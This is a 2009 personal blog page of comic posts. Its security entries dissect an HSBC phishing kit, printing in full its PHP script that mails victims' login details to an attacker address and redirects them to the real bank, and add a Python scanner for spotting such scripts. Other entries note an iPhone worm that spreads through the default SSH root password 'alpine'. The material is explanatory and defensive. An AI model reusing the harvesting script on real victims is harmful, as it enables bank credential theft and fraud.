WARNING: THIS POST CONTAINS MILD PERIL
I pulled up outside my house earlier, put the handbrake on and turned off the ignition. You may have guessed at this point, I was in the car. I undid my seat belt, and tried to open the door. Notice I say tried. The wind was pushing so hard against the door, I couldn’t open it. I tried again. Still it wouldn’t budge. Confused and desperate I tried once more and finally, the door came open – just long enough for me to jump out. It was a life changing experience. What if I hadn’t managed to escape? If I was trapped in the car all night. Here is how I predict it would have gone down -
Hour 1 – I would have tried over and over to open the door. Thus tiring myself out. I would have then put on my iPod which I had with me to take my mind off it. It would have had about four hours of battery life on it.
Hour 2 – I would be getting cold. So I would turn the ignition on and try to get some heat going. After a while the heater would have made me feel sick, so I would have turned it off, and got cold again.
Hour 3 – At this point I would be so cold, for comfort I would pretend that Lily Allen was singing to me while listening to my iPod.
Hour 4 – iPod battery dies. I then do that thing where I try to remember exactly how a Simpsons episode goes and replay it in my head.
Hour 5 – I need to drink, so I start to lick my sweat and drink that. It tastes bad, but not as bad as Yakult.
Hour 6 – Feeling that death is imminent I would start to write my will on my mobile phone. I haven’t got an iPhone so I wouldn’t have an app for this.
Hour 7 – I would realise that all I needed to do was get out of the passenger door as that side of the car was shielded from the wind.
Posted: November 24th, 2009
Categories:
General
Tags:
Comments:
No Comments.
Phishing emails are now a regular sight in the world’s inboxes. Most work by pretending to be from a bank, asking for personal details to “verify security”. Most go straight to the junk mail folder, never to be seen by man. If they get through to the inbox, the grammar used in the message body typically resembles that of an 8 year old child. Apart from the Baby MD at Velvet, white-collar child employment remains at an all time low, so most people work out that the message is a fake. However, there are still lots of people who fall for these tricks.
When I get a Phishing email I tend to examine it, to learn more about the way it works. I got a classic example today, so I’ll share with you how it works.
Delivery – It starts with an email, in this example – the message is supposed to be from HSBC.

Step One: Victim receives poorly worded Email, not from a drunk friend.
So I have to click on the link at the bottom, fair enough, it goes to hsbc.co.uk right? Err, actually no. Hovering the mouse over the link reveals it takes you to a random website. This could be any site that has been hacked, and had the phishing site files uploaded to it. In this case it was a photo framing company.
Reel Big Phish - So the victim clicks the link and heads off to the fake bank site. It looks pretty genuine. Internet Explorer and Firefox will alert if the site has been reported as a phishing site, so if this is a relatively new phish you may not get a warning. In this case IE did tell me I shouldn’t go to the site. I’ve removed the site’s domain name from the URL to protect the company in question, but you can see that the fake site has been set up in a subdirectory of the hacked site.

Step Two: This site is to HSBC as Katie Price is to Boobs.
Entering Details – So the victim enters their login details. The details are then secretly emailed to the phishermen (the bad guys who set up the site). Once the continue button has been pressed the victim is redirected to the real HSBC site, and told they have entered an incorrect password. They try again, and this time they login to the genuine site and think nothing of it – until they notice money missing from their bank account a few days later. All very scary.
So how exactly does the fake site email the details to the bad guys? Well, kindly, on this example the phishermen left an entire copy of the fake site in a zip file, so it is possible to examine the source code of the fake pages and find out. Source code is basically a list of instructions performed by the server hosting a site. There are two elements to source code in web site development, client side and server side. Client side code renders the page in your browser, so you can always see the results of client side code execution and even view the code if you want to. Server side code is executed on the web server, and is not normally visible to end users. That’s us.
So in this example when a user enters details and presses the continue button, the following code is executed on the server side.
<?
// Record the victim's IP address alongside the submitted form fields.
$ip = getenv("REMOTE_ADDR");
// $do holds the string "mail", so $do(...) further down is an indirect call to mail().
$do = "mail";
$message .= "--------------USER-----------------------\n";
$message .= "User ID : ".$_POST['user']."\n";
$message .= "Date of Birth : ".$_POST['dob']."\n";
$message .= "Security Number : ".$_POST['securityno']."\n";
$message .= "IP : ".$ip."\n";
$message .= "--------------I MUST RICH---------------\n";
$send = "hacker1@randomfreeemailsite.com";
$subject = "HSBC UK | $user | $ip";
$headers = "From: HSBC <hsbc@bank.co.uk>";
$headers .= $_POST['name']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
{
mail($send,$subject,$message,$headers);
// $er is not defined anywhere in the script as shown.
$do($er,$subject,$message,$headers);
}
// Hand the victim over to the genuine site.
header("Location:https://www.hsbc.co.uk/1/screens/html/SessionWarning/jsp/ExitFusedSite.jsp");
?>
This code does the following – Collect the Remote IP address of the victim, then get the values entered for User ID, Date of Birth and Security Number. Then mail this information to the email address specified in the code. The email address is usually set up on a free email host, in this example I have changed the actual email addresses used by the bad guys. Then finally it redirects the victim to the real HSBC site. Crafty swines.
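For the owner of a site like the hacked photo framing company, the same three steps (read POSTed fields, mail them, redirect to someone else's site) make a usable signature when scanning a webroot. This is an added example, not code from the original post: the function name, the host shop.example and both sample scripts are constructed, the first one modelled on the script above with the recipient left out.

```python
import re
from urllib.parse import urlparse

POST_RE = re.compile(r"\$_POST\s*\[\s*['\"](\w+)['\"]\s*\]")
MAIL_RE = re.compile(r"(?<![\w$>])mail\s*\(")
ALIAS_RE = re.compile(r"\$(\w+)\s*=\s*['\"]mail['\"]\s*;")
REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location:\s*(https?://[^'\"\s]+)", re.I)

def analyse_php(source, own_host):
    """Flag a script that mails POSTed fields and then redirects off-site."""
    fields = sorted(set(POST_RE.findall(source)))
    # $x = "mail"; ... $x(...) calls mail() without the literal text "mail(".
    indirect = any(re.search(r"\$" + re.escape(a) + r"\s*\(", source)
                   for a in ALIAS_RE.findall(source))
    sends_mail = bool(MAIL_RE.search(source)) or indirect
    m = REDIRECT_RE.search(source)
    host = urlparse(m.group(1)).hostname if m else None
    offsite = host is not None and host != own_host and not host.endswith("." + own_host)
    return {"fields": fields, "indirect_mail": indirect, "redirect_host": host,
            "suspicious": bool(fields) and sends_mail and offsite}

# Constructed sample modelled on the script in the post.
KIT_SAMPLE = r'''<?
$do = "mail";
$message .= "User ID : ".$_POST['user']."\n";
$message .= "Security Number : ".$_POST['securityno']."\n";
mail($send,$subject,$message,$headers);
$do($er,$subject,$message,$headers);
header("Location:https://www.hsbc.co.uk/1/screens/html/SessionWarning/jsp/ExitFusedSite.jsp");
?>'''

# Constructed sample: an ordinary contact form that stays on its own site.
CONTACT_SAMPLE = r'''<?php
mail("owner@shop.example", "Enquiry", $_POST['message']);
header("Location: https://shop.example/thanks.html");
?>'''

if __name__ == "__main__":
    for name, src in (("kit", KIT_SAMPLE), ("contact form", CONTACT_SAMPLE)):
        print(name, analyse_php(src, "shop.example"))
```

The contact form also uses `mail()` and `$_POST`, but it redirects to its own host, so only the first sample is flagged.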
So, a general rule, never follow links in emails. You don’t wanna get caught by the phishermen!
Posted: November 22nd, 2009
Categories:
Security
I used to love Peter Kay, I even have a signed DVD. Phoenix Nights, That Peter Kay Thing, Max and Paddy – brilliantly entertaining. The stand up shows were incredible, everyone loved them – it would have been easier to give everyone in the country a ticket, then people who didn’t want to go give their tickets back. I got well excited when I heard Peter was going to announce a new tour, I will definitely go to that I thought. There will probably be a show in Birmingham, there always is. If I can’t get tickets to Birmingham I could go somewhere else, Cardiff maybe. There will probably be 180ish dates.
No.
Four Dates.
Four.
“Well OK, is one of the four dates in Birmingham?”. I hear you ask.
No.
The first is Manchester, the second is Manchester, the third is Manchester, the fourth…Manchester.
That’s just silly. I feel really let down and I’m sure a lot of other Peter Kay fans feel the same. It seems that this four night run will be just long enough to cut together a DVD to be released in time for Christmas 2010. Why do a really good stand up tour when you can just bang out a DVD? For shame Peter, for shame.
Posted: November 20th, 2009
Categories:
Comedy
Chicken Tikka Dhansak, Custard Cream Biscuits, Scones, Pizza, Egg and Bacon Baps, Muffins, Marks and Spencer White Chocolate Chip Cookies, a McFlurry, Bacon and Mushroom Pasta, Fish and Chips, Subway, Cheesecake, anything with Custard on, Flapjacks, Cheesy Chips at 3am, Fruit Loaf, American Pancakes, Fajitas, Eggy Bread, Burgers, Cheese and Pineapple on Cocktail Sticks, Fruit Pastille Lollies, Rice-Krispy Squares, Cherry Pie, Apple Crumble, Ginger Bread People, KFC Avalanche, Sweet Chilli Chicken, Sunday Roast, Crunchy Nut Cornflakes, Oatibix, Chicken Madras, Lamb Rogan Josh, Mongolian Beef, Sweet and Sour Pork Balls, Nachos, Steak, Jacket Potatoes covered in Cheese and Baked Beans, Rice Pudding, Chicken Korma, Chunky Chips, Fish Finger Sandwiches, Banana Chips, Doritos and Salsa Dip..
Posted: November 19th, 2009
Categories:
State of the World
I’ve always considered Calvin Harris to be a bit, mopey, boring and Scottish for my liking. His music is OK, it’s better after a few drinks, but hardly groundbreaking. He did jump about a million points in my estimation though, the moment he decided to run onto the X-Factor stage during a performance by “Jedward” brandishing a pineapple. I wasn’t watching at the time, I was busy, existing.

25% of the pricks in this photo are on the surface of the pineapple.
Calvin said afterwards that it was all a serious point, showing how Simon Cowell had domination of the charts and was ruining music. Descending the show to the point of farce he would prove that the show was not about the music, but merely a comedy fest. It’s a good point, but a stupid one – for this reason. Any true music fan is already aware of this. Simon Cowell may dominate the “official” charts with his army of heavily auto-tuned, anorexic pop-starlets – but he is nowhere to be found in the most important chart of them all, the one that exists only in my head.
I choose what to listen to, and I listen to it. You all probably do the same. We live in the iPod age, if we don’t like the mainstream it has never been easier to set up our own tributary of indie, techno, nu-rave, metal, rock, hip-hop or James Blunt. I could, if I wanted to, record an album on my PC tonight, and have it released on iTunes in the morning. My music would be available worldwide, instantly. Then if anyone wanted to listen to it, they could.
So Calvin, don’t worry about Mr Cowell, peddling his bollocks - in full view of everyone, due to having his trousers pulled up so tight. Keep making your music, if people love it, it’ll sell. Oh, and cheer up.
Posted: November 16th, 2009
Categories:
State of the World
I recently headed to the Cinema, only to be turned around because there was a power cut. Not an exciting story. I tried again a couple of days later – success! Now which film..it was narrowed down to The Fourth Kind and Jennifer’s Body. Jennifer’s Body started off the clear winner, it was written by Diablo Cody, who wrote Juno, which was pretty good, and of course it has the Megan Fox edge. Megan Fox equals several very large ticks in many boxes. However, the Fourth Kind was chosen on the basis of good reviews.
The film is good, it’s different and it is scary, on one condition. Do not Google around for information before viewing, do so afterwards, the day after you have seen the film. Google and IMDB will ruin the fun!
I’ll probably get Jennifer’s Body on DVD, and take advantage of the pause function on my DVD player.
Posted: November 15th, 2009
Categories:
General

The T-Mobile Couple
This really angers me, in a way I can’t explain. These two are the most annoying people on telly at the mo. She is beautiful, she looks really clever and is probably quite friendly. He is the biggest super-chump that ever roamed the planet, he looks like a young Goldmember for christ’s sake. He tries to be funny. He isn’t. Yet, she is laughing at him all through the interview, making all kinds of faces, like he is so ace. She is wrapped around his little finger. Arse. He must have money.
Posted: November 12th, 2009
Categories:
State of the World
Interesting to hear that good ol’ Microsoft won a patent today, on a truly original idea. Imagine being able to be logged in as a normal user, and then if you need to run a command as a more powerful user, being able to do so without having to log out and log back in again. All you need to do is enter a password. Wow. That’s a really clever idea. Well done Microsoft. Oh, but hold on a sec…I’m sure that I’ve come across something slightly similar in Linux..oh yeah..I’ve pretty much just described the “sudo” command. I’m quite pleased though really, if more Unix stuff finds its way into Windows it’ll probably improve it.
Posted: November 12th, 2009
Categories:
General
Yesterday I wrote about the first worm to attack the iPhone, I mentioned how it wasn’t all that nasty, but probably would inspire nasty worms. I was right, yay! “iPhone-Privacy-A” – This works on the same principle as the RickRolling worm, but it’ll steal user data and then delete it, without letting you know it’s been there. Nice. So be careful, and like I said yesterday if you use a Jail-Broken iPhone with SSH installed – change the password!
Posted: November 11th, 2009
Categories:
Security
The first “Worm” to attack the Apple iPhone has been created and deployed into the wild in Australia, where it is spreading like…erm…yeah I won’t say that, probably a bit too soon. There have been various other exploits against iPhones in the past, but this is slightly different, as it is a worm, it quickly self replicates and spreads, a bit like Davina McCall.
There are two reasons why you shouldn’t panic. One – it ain’t a nasty worm. It changes the wallpaper on the iPhone to a pic of Rick Astley. In fact, if Rick Astley had an iPhone, he probably wouldn’t mind getting the worm. Two – it only affects “Jailbroken” iPhones, that is iPhones that have been modded to remove Apple’s in built security and have secure shell (SSH) installed. It spreads using SSH and the default root password, which is “alpine”. So really, it’s more of a Linux worm.
The time to panic will come if malicious hackers start to build cleverer payloads, that steal or destroy the phone’s contents. Which, trust me, they will. In fact, they probably already have. It’s worth remembering, if you have an iPhone, or even an iPod, it should be treated in exactly the same manner as your home PC or laptop when it comes to security, because it is a tiny computer.
The number of iPhones in the wild has jumped significantly today, as Orange customers in the UK can now go get one, and I’m sure a few O2 customers have jumped ship too. Go and check out the difference in the two providers 3G networks if you want to know why!
Now I’m going to go eat some fruit, what with all this talk of apples and oranges…
Posted: November 10th, 2009
Categories:
Security